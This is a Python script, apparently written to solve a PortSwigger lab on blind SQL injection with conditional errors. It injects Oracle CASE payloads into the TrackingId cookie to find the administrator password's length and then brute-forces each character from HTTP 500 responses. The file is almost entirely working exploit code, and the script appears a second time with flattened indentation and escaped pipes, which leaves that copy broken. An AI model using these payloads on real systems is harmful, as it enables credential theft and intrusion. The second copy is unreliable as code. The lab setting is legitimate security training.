geoffchisnall/sql_condition_error.txt

## sql_condition_error.txt
#!/usr/bin/python3
#https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors
#FInd the length of the password and bruteforce it.

import requests,string

url = 'https://0a23003f0404ba6dc15226a500cf0001.web-security-academy.net/'

s = requests.Session()
r = s.get(url)
tcookie = (r.cookies["TrackingId"])
print(tcookie)

cookievalue = ''
password = ''

characters = list(string.ascii_lowercase)
characters = characters + list(string.digits)

numbers = list(string.digits)

for n in range(1,30):
    #print(n)
    cookies = {'TrackingId':cookievalue}
    payload = "'||(SELECT CASE WHEN LENGTH(password)=%s THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||';" % (n)
    cookievalue = tcookie+payload
    cookies = {'TrackingId':cookievalue}
    #print(cookievalue)
    #print(str(cookies))
    sr = requests.get(url, cookies=cookies)
    response = sr.status_code
    #print(response)
    response = str(response)
    if "500" in response:
        print("The password length is %s" % (n))
        for nl in range(1,n+1):
            for char in characters:
                #print(char)
                payload_password = "'||(SELECT CASE WHEN SUBSTR(password,%s,1)='%s' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'" % (nl,char)
                #print(payload_password)
                cookievalue = tcookie+payload_password
                cookies = {'TrackingId':cookievalue}
                #print(cookievalue)
                #print(str(cookies))
                sr1 = requests.get(url, cookies=cookies)
                response = sr1.status_code
                response = str(response)
                if "500" in response:
                  #print(char)
                  print("digit found: %s" % (char))
                        #else:
                  password = password + char

print("Administrator password is: " + password)
	#!/usr/bin/python3
	#https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors
	#FInd the length of the password and bruteforce it.

	import requests,string

	url = 'https://0a23003f0404ba6dc15226a500cf0001.web-security-academy.net/'

	s = requests.Session()
	r = s.get(url)
	tcookie = (r.cookies["TrackingId"])
	print(tcookie)

	cookievalue = ''
	password = ''

	characters = list(string.ascii_lowercase)
	characters = characters + list(string.digits)

	numbers = list(string.digits)

	for n in range(1,30):
	#print(n)
	cookies = {'TrackingId':cookievalue}
	payload = "'\|\|(SELECT CASE WHEN LENGTH(password)=%s THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')\|\|';" % (n)
	cookievalue = tcookie+payload
	cookies = {'TrackingId':cookievalue}
	#print(cookievalue)
	#print(str(cookies))
	sr = requests.get(url, cookies=cookies)
	response = sr.status_code
	#print(response)
	response = str(response)
	if "500" in response:
	print("The password length is %s" % (n))
	for nl in range(1,n+1):
	for char in characters:
	#print(char)
	payload_password = "'\|\|(SELECT CASE WHEN SUBSTR(password,%s,1)='%s' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')\|\|'" % (nl,char)
	#print(payload_password)
	cookievalue = tcookie+payload_password
	cookies = {'TrackingId':cookievalue}
	#print(cookievalue)
	#print(str(cookies))
	sr1 = requests.get(url, cookies=cookies)
	response = sr1.status_code
	response = str(response)
	if "500" in response:
	#print(char)
	print("digit found: %s" % (char))
	#else:
	password = password + char

	print("Administrator password is: " + password)